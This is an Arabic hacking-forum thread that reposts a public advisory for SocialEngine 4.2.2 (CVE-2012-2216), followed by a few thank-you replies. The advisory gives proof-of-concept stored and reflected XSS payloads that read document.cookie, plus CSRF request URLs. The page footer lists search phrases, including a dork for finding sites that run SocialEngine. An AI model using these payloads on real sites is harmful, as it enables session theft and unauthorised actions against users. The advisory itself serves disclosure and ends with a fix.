اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }

ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }


النتائج 1 إلى 4 من 4

الموضوع: ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }

  1. #1
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    Gadid ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }



    بسم الله الرحمن الرحيم




    كود PHP:
    Social Engine 4.2.2 Multiples Vulnerabilities
    Earlier versions are also possibly vulnerable
    .
     
    INFORMATION
     
    Product
    Social Engine 4.2.2
    Remote
    -Exploityes
    Vendor
    -URLhttp://www.socialengine.net/
    Discovered byTiago Natel de Moura aka "i4k"
    Discovered at10/04/2012
    CVE Notified
    10/04/2012
    CVE Number
    CVE-2012-2216
     
    OVERVIEW
     
    Social Engine versions 4.2.2 is vulnerable to XSS 
    and CSRF.
     
    INTRODUCTION
     
    SocialEngine is a PHP
    -based white-label social networking service
    platform
    that provides features similar to a social network on a user's
    website. Main features include administration of small-to-mid scale
    social networks, some customization abilities, unencrypted code,
    multilingual capability, and modular plugin/widget compatibility. There
    is a range of templates and add-ons available to extend the basic
    features already included in the SocialEngine core.
     
    VULNERABILITY DESCRIPTION
     
    == Persistent XSS in music upload. ==
     
    CWE-79: http://cwe.mitre.org/data/definitions/79.html
    The software does not neutralize or incorrectly neutralizes
    user-controllable input before it is placed in output that is
    used as a web page that is served to other users.
     
    Proof Of Concept:
    POST http://localhost/index.php/music/create
     
    POST data without form-data enctype:
    title=**********alert(document.cookie);</script>&description=teste
    &search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
    &fancyuploadfileids=15
     
    == Persistent XSS in creating events ==
     
    POST
    http://localhost/socialengine/socialengine422_trial/index.php/events/create
     
    POST data without form-data enctype:
    title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&
    starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012
    &endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste
    &location=**********alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
    photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
    auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=
     
    == Reflected XSS in search form of events area. ==
     
    Direct javascript injected:
    POST http://localhost/index.php/widget/index/content_id/644
     
    format=html&subject=event_1&search='
    ;alert(document.cookie);var '
     
    Proof of Concept:
    - - Go to URL: /index.php/event/$EVENT_ID
    - - Click on the "Guests"
    - - Click in "Search guests" form
    - - Submit: '
    ;alert(document.cookie); var '
     
    You will see your PHPSESSID in the alert.
     
    == Multiples CSRF vulnerabilities ==
     
    CWE-352: http://cwe.mitre.org/data/definitions/352.html
    The web application does not, or can not, sufficiently verify whether
    a well-formed, valid, consistent request was intentionally provided by
    the user who submitted the request.
     
    A CSRF in the plugin "Forum" allows forcing the owner of the event to do
    some
    activities such as:
     
    Close a topic:
    GET /index.php/forums/topic/4/example-topic/close/close/1
     
    Open a topic:
    GET /index.php/forums/topic/4/example-topic/close/close/0
     
    A CSRF in the plugin "Event" allows forcing the owner of the event to do
    some
    activities such as:
     
    Close the event:
    GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2
     
    Open the event:
    GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2
     
    "Watch Topic":
    GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2
     
    "Stop Watching Topic":
    GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2
     
    A CSRF in the plugin "Classifieds" allows forcing the owner of the event
    to do
    some activities such as:
     
    Open the classified listing:
    GET /index.php/classifieds/close/1/closed/0
     
    Close the classified listing:
    GET /index.php/classifieds/close/1/closed/1
     
    VERSIONS AFFECTED
     
    Tested with version 4.2.2 but earlier versions are possibly vulnerable.
     
    SOLUTION
     
    Upgrade to Social Engine 4.2.4.
     
    NOTES
     
     
    The Common Vulnerabilities and Exposures (CVE) project has assigned the
    name CVE-2012-2216 to this issue. This is a candidate for inclusion in
    the CVE list (http://cve.mitre.org), which standardizes names for
    security problems.
    CREDITS
     
    Tiago Natel de Moura aka "i4k"
    SEC+ Information Security Company - http://www.secplus.com.br/
    BugSec Security Team - http://bugsec.googlecode.com/
     
    -- 
    Tiago Natel de Moura
    IT Security Consultant                      
    http://www.linkedin.com/in/tiagonatel
    http://www.secplus.com.br/
    http://github.com/tiago4orion
    http://code.google.com/p/bugsec 



    رابط الثغرة : http://www.exploit-db.com/exploits/18927


    تحياتي




  2. #2
    :: مشرف قسم الباك تراك :: Array الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }

    كل الشكر والتقدير لك على مجهودك العظيم ....
    بآلتوفيق عزيزى ...


  3. #3
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    افتراضي رد: ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }

    تسلم يا غالي على موروكـ
    نسئل الله حسن الخاتمه



  4. #4
    هكر نشيط Array الصورة الرمزية wassim rel
    تاريخ التسجيل
    Jun 2012
    المشاركات
    112

    افتراضي رد: ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }

    شكرا لك يا غالي


المواضيع المتشابهه

  1. ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-24-2012, 10:26 AM
  2. ثغره جديده { Free Realty v3.1-0.6 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-24-2012, 06:11 AM
  3. ثغره جديده { Travelon Express CMS v6.2.2 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 05-14-2012, 02:46 PM
  4. ثغره جديده { Proman Xpress v5.0.1 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 05-14-2012, 06:52 AM
  5. ثغره جديده { Viscacha Forum CMS v0.8.1.1 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 05-14-2012, 06:48 AM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرة pluginsfeatured-page-widgetfeatured-page-widget.php

اخلاقي تاج راسي

Multiple Vulnerabilities ثغرة

اختراق موقع بثغرة Multiple XSSCSRF

intext:Powered by SocialEngine

ثغرة Multiple

ثغرة في featured-page-widget

ثغرة سكربت سكيل

powered by socialengine

ثغرة allinurl: get-widget.phpwid=

SocialEngine PHP 4.2 jplيل

PluginEvent برنامج

facebook template for social engine 4.2

ثغرة في سكربت social engine

social engine white page

Multiple Vulnerabilities ثغرة

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •